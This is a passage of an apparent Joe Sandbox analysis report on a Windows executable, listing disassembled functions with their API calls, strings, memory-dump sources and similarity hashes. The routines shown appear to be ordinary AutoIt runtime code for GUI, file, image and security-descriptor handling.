SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A7D0DA

Part of subcall function 00A2B526: GetWindowLongW.USER32(?,000000EB), ref: 00A2B537

Strings

0, xrefs: 00A7CF1B
tooltips_class32, xrefs: 00A7CFED, 00A7D06E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 3446585b331674c9f0c79b9cd319f217e6dc0911ad0c5e95b94c8645a8e2bad5
Instruction ID: 73123b9b819b0e07419baed6eef640e411925407c119fb7f034d1704a248a024
Opcode Fuzzy Hash: 3446585b331674c9f0c79b9cd319f217e6dc0911ad0c5e95b94c8645a8e2bad5
Instruction Fuzzy Hash: B9717871240205AFD720DF68DC85FA677F5EB88704F04851EFA8A872A1DB74E943CB22

Function 00A7F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

DragQueryPoint.SHELL32(?,?), ref: 00A7F37A

Part of subcall function 00A7D7DE: ClientToScreen.USER32(?,?), ref: 00A7D807
Part of subcall function 00A7D7DE: GetWindowRect.USER32(?,?), ref: 00A7D87D
Part of subcall function 00A7D7DE: PtInRect.USER32(?,?,00A7ED5A), ref: 00A7D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 00A7F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A7F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A7F411
_wcscat.LIBCMT ref: 00A7F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A7F458
SendMessageW.USER32(?,000000B0,?,?), ref: 00A7F471
SendMessageW.USER32(?,000000B1,?,?), ref: 00A7F488
SendMessageW.USER32(?,000000B1,?,?), ref: 00A7F4AA
DragFinish.SHELL32(?), ref: 00A7F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A7F59C

Strings

@GUI_DROPID, xrefs: 00A7F4D1
@GUI_DRAGID, xrefs: 00A7F510
@GUI_DRAGFILE, xrefs: 00A7F54B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: b2c6433b506fa9ff41421cfa3d020b66e1de5a389a302ffe9466105f3190f29c
Instruction ID: 2c377fe64fdca78c99034e29be4db641894d1aacd07ca1ab5ab41af1437924ab
Opcode Fuzzy Hash: b2c6433b506fa9ff41421cfa3d020b66e1de5a389a302ffe9466105f3190f29c
Instruction Fuzzy Hash: B1611871108300AFC711EF64DD85E9FBBF8FF89714F004A2EB695921A1DB709A4ACB52

Function 00A5AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00A5AB3D
VariantCopy.OLEAUT32(?,?), ref: 00A5AB46
VariantClear.OLEAUT32(?), ref: 00A5AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A5AC40
__swprintf.LIBCMT ref: 00A5AC70
VarR8FromDec.OLEAUT32(?,?), ref: 00A5AC9C
VariantInit.OLEAUT32(?), ref: 00A5AD4D
SysFreeString.OLEAUT32(00000016), ref: 00A5ADDF
VariantClear.OLEAUT32(?), ref: 00A5AE35
VariantClear.OLEAUT32(?), ref: 00A5AE44
VariantInit.OLEAUT32(00000000), ref: 00A5AE80

Strings

Default, xrefs: 00A5ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 00A5AC6A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: d089411376f7dee425aef6ddb1508b50bf744a9083f08c31c1f37ff6801bc2e8
Instruction ID: f83409fc9bd6a078276f19b036387fa40218af01ff62d74c78e20bbf1448d2b4
Opcode Fuzzy Hash: d089411376f7dee425aef6ddb1508b50bf744a9083f08c31c1f37ff6801bc2e8
Instruction Fuzzy Hash: CDD10231700215EBCB10EFA5D885B6EB7B5FF14702F158665EC099B180DB74EC88DBA2

Function 00A7716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A771FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A77247

Strings

EXPAND, xrefs: 00A772E1
EXISTS, xrefs: 00A772B0
CHECK, xrefs: 00A77267
GETTEXT, xrefs: 00A77382
COLLAPSE, xrefs: 00A7728D
SELECT, xrefs: 00A773E0
ISCHECKED, xrefs: 00A773B2
UNCHECK, xrefs: 00A7740B
GETTOTALCOUNT, xrefs: 00A7722A
GETITEMCOUNT, xrefs: 00A77311
GETSELECTED, xrefs: 00A7733F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 42d3ee8aefff9abaea9d42b7086db400b0f6d2427656ae28e050bea0ba6ead47
Instruction ID: f27cf04b55a42e5bf46affa0f9c647d34898b32b4c51569bcf102b2cca643d93
Opcode Fuzzy Hash: 42d3ee8aefff9abaea9d42b7086db400b0f6d2427656ae28e050bea0ba6ead47
Instruction Fuzzy Hash: 9F9153346087119BCB04EF14D951AAEB7A5BF94310F01C86DF89A5B3A3DB30ED4ACB85

Function 00A7E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A7E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A7BEAF), ref: 00A7E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A7E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A7E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A7E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00A7BEAF), ref: 00A7E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A7E6DF
DestroyIcon.USER32(?,?,?,?,?,00A7BEAF), ref: 00A7E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A7E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A7E717

Part of subcall function 00A30FA7: __wcsicmp_l.LIBCMT ref: 00A31030

Strings

.exe, xrefs: 00A7E541
.icl, xrefs: 00A7E521
.dll, xrefs: 00A7E564

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 62238b5c0f5c358806a71baddf29b986c57c9923712343209049afcc66591fb9
Instruction ID: 93c63d7a264b2c2237fe0d627270795dbacb10ff615b778573a12b00ab3a3d71
Opcode Fuzzy Hash: 62238b5c0f5c358806a71baddf29b986c57c9923712343209049afcc66591fb9
Instruction Fuzzy Hash: F161D271600219BAEB24DF64CD46FFE7BA8BB18724F108546F919E61D0EB70E990CB60

Function 00A5D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

CharLowerBuffW.USER32(?,?), ref: 00A5D292
GetDriveTypeW.KERNEL32 ref: 00A5D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5D38C

Strings

open , xrefs: 00A5D2EE
type cdaudio alias cd wait, xrefs: 00A5D30A
set cd door , xrefs: 00A5D32D
open, xrefs: 00A5D2B9
close, xrefs: 00A5D298
close cd wait, xrefs: 00A5D377
closed, xrefs: 00A5D2A6, 00A5D2AF
wait, xrefs: 00A5D349

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 6276752ea4291b954a86427c92d7949c62acffde005f959655bc512068977904
Instruction ID: 9b447762c62a59a5340a5bdc3b42688cbefd72eaca43fbdc316dceb79b66cf89
Opcode Fuzzy Hash: 6276752ea4291b954a86427c92d7949c62acffde005f959655bc512068977904
Instruction Fuzzy Hash: 70512971504305AFC700EF24D9819AEB7F4FF98758F00896DF895AB251DB31AE4ACB92

Function 00A526BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00A83973,00000016,0000138C,00000016,?,00000016,00AADDB4,00000000,?), ref: 00A526F1
LoadStringW.USER32(00000000,?,00A83973,00000016), ref: 00A526FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00A83973,00000016,0000138C,00000016,?,00000016,00AADDB4,00000000,?,00000016), ref: 00A5271C
LoadStringW.USER32(00000000,?,00A83973,00000016), ref: 00A5271F
__swprintf.LIBCMT ref: 00A5276F
__swprintf.LIBCMT ref: 00A52780
_wprintf.LIBCMT ref: 00A52829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A52840

Strings

Error: , xrefs: 00A527F7
^ ERROR, xrefs: 00A527D5
Line %d (File "%s"):, xrefs: 00A52769
Line %d:, xrefs: 00A5277A
%s (%d) : ==> %s: %s %s, xrefs: 00A52824

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 58ff7b12581bc081b1cbf16f84fa635d62f985f90b64f8b1a8f215d0bdedfb01
Instruction ID: b2afa689a5eff7e2f0e58a57155729136be001f7fc20772173d0527d7fcb3be3
Opcode Fuzzy Hash: 58ff7b12581bc081b1cbf16f84fa635d62f985f90b64f8b1a8f215d0bdedfb01
Instruction Fuzzy Hash: A6414F72800219BACF15FBE0DE86EEEB778AF55351F500165B502B6092EA346F89CB60

Function 00A5D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A5D0D8
__swprintf.LIBCMT ref: 00A5D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A5D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A5D15C
_memset.LIBCMT ref: 00A5D17B
_wcsncpy.LIBCMT ref: 00A5D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A5D1EC
CloseHandle.KERNEL32(00000000), ref: 00A5D1F7
RemoveDirectoryW.KERNEL32(?), ref: 00A5D200
CloseHandle.KERNEL32(00000000), ref: 00A5D20A

Strings

\??\%s, xrefs: 00A5D0F4
:, xrefs: 00A5D11B
\, xrefs: 00A5D110

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: d5ba47f8549d458ddbb80c2ddf4c6cfb0fa76911bc85b9b4a546b97f54ae6a5f
Instruction ID: 3d1ec7348036276211089cc4339af69da28d40de654b50cf04bd6e59d84ed037
Opcode Fuzzy Hash: d5ba47f8549d458ddbb80c2ddf4c6cfb0fa76911bc85b9b4a546b97f54ae6a5f
Instruction Fuzzy Hash: 8E317272600109ABDB21DFA4DC49FEF77BCBF89741F1041AAF909D6160EB7096858B24

Function 00A7E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A7BEF4,?,?), ref: 00A7E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A7BEF4,?,?,00000000,?), ref: 00A7E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A7BEF4,?,?,00000000,?), ref: 00A7E776
CloseHandle.KERNEL32(00000000,?,?,?,?,00A7BEF4,?,?,00000000,?), ref: 00A7E783
GlobalLock.KERNEL32(00000000), ref: 00A7E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A7BEF4,?,?,00000000,?), ref: 00A7E79B
GlobalUnlock.KERNEL32(00000000), ref: 00A7E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,00A7BEF4,?,?,00000000,?), ref: 00A7E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A7BEF4,?,?,00000000,?), ref: 00A7E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A9D9BC,?), ref: 00A7E7D5
GlobalFree.KERNEL32(00000000), ref: 00A7E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 00A7E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A7E834
DeleteObject.GDI32(00000000), ref: 00A7E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A7E872

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 29c5eb0abe1f812d8e3e216a4c573dd96e99536a64d4f7a79e7c77e615b0e66b
Instruction ID: ae6d384f3b63de0f504c9ac273f3a0c8ca2271cac89c275ee819f7aa02657a36
Opcode Fuzzy Hash: 29c5eb0abe1f812d8e3e216a4c573dd96e99536a64d4f7a79e7c77e615b0e66b
Instruction Fuzzy Hash: E0411A75600204FFDB11DFA5DC48EAA7BB9EF89715F108059F90AD7260DB319D82DB60

Function 00A605F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00A6076F
_wcscat.LIBCMT ref: 00A60787
_wcscat.LIBCMT ref: 00A60799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A607AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00A607C2
GetFileAttributesW.KERNEL32(?), ref: 00A607DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00A607F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00A60806

Strings

*.*, xrefs: 00A60845

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 1f3ecb57864ed17ab3eda3c5ae94dfa96a115ab9c850988ab3fe2ce0822f5570
Instruction ID: 256fbe483f46fde3d9f3bed19027f1c60f4b8a91f8cec9c51343aa7d1e7d45e1
Opcode Fuzzy Hash: 1f3ecb57864ed17ab3eda3c5ae94dfa96a115ab9c850988ab3fe2ce0822f5570
Instruction Fuzzy Hash: 6B819D756043019FCB24DF64C944DAFB7F8AB88304F188C2EF889C7251EA70E9848B92

Function 00A7EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A7EF3B
GetFocus.USER32 ref: 00A7EF4B
GetDlgCtrlID.USER32(00000000), ref: 00A7EF56
_memset.LIBCMT ref: 00A7F081
GetMenuItemInfoW.USER32 ref: 00A7F0AC
GetMenuItemCount.USER32(00000000), ref: 00A7F0CC
GetMenuItemID.USER32(?,00000000), ref: 00A7F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00A7F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00A7F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A7F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A7F1C8

Strings

0, xrefs: 00A7F079

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: f9e1a8be840579c6b3572cd1c0265f789f5310ab977ff540fb126044a153bd44
Instruction ID: 871f5726d9855647c7f8884dee3ea80007156367ecaf1ab04a10fdb02b1953b4
Opcode Fuzzy Hash: f9e1a8be840579c6b3572cd1c0265f789f5310ab977ff540fb126044a153bd44
Instruction Fuzzy Hash: 20818E71604301AFD710CF54DD84A6BBBE9FB88314F40C62EFA9997291D770DA46CBA2

Function 00A4A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00A4ABD7
Part of subcall function 00A4ABBB: GetLastError.KERNEL32(?,00A4A69F,?,?,?), ref: 00A4ABE1
Part of subcall function 00A4ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00A4A69F,?,?,?), ref: 00A4ABF0
Part of subcall function 00A4ABBB: HeapAlloc.KERNEL32(00000000,?,00A4A69F,?,?,?), ref: 00A4ABF7
Part of subcall function 00A4ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00A4AC0E

Part of subcall function 00A4AC56: GetProcessHeap.KERNEL32(00000008,00A4A6B5,00000000,00000000,?,00A4A6B5,?), ref: 00A4AC62
Part of subcall function 00A4AC56: HeapAlloc.KERNEL32(00000000,?,00A4A6B5,?), ref: 00A4AC69
Part of subcall function 00A4AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A4A6B5,?), ref: 00A4AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A4A8CB
_memset.LIBCMT ref: 00A4A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A4A8FF
GetLengthSid.ADVAPI32(?), ref: 00A4A910
GetAce.ADVAPI32(?,00000000,?), ref: 00A4A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A4A969
GetLengthSid.ADVAPI32(?), ref: 00A4A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A4A995
HeapAlloc.KERNEL32(00000000), ref: 00A4A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A4A9BD
CopySid.ADVAPI32(00000000), ref: 00A4A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A4A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A4AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A4AA2F

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f05f4d5a1ae69df2ca948fac72be816b762124c68db861d9e8319bb4f6e0cc38
Instruction ID: 734ec9378e708f9c0649ec159154349941dd701cb42e73c426a40825a7966a09
Opcode Fuzzy Hash: f05f4d5a1ae69df2ca948fac72be816b762124c68db861d9e8319bb4f6e0cc38
Instruction Fuzzy Hash: D2517075A40209AFDF10DF91DD85EEEBBB9FF54300F04812AF912A7290DB359A46CB61

Function 00A69DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A69E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A69E42
CreateCompatibleDC.GDI32(?), ref: 00A69E4E
SelectObject.GDI32(00000000,?), ref: 00A69E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A69EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00A69EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A69F0F
SelectObject.GDI32(00000006,?), ref: 00A69F17
DeleteObject.GDI32(?), ref: 00A69F20
DeleteDC.GDI32(00000006), ref: 00A69F27
ReleaseDC.USER32(00000000,?), ref: 00A69F32

Strings

(, xrefs: 00A69ED7

Memory Dump Source

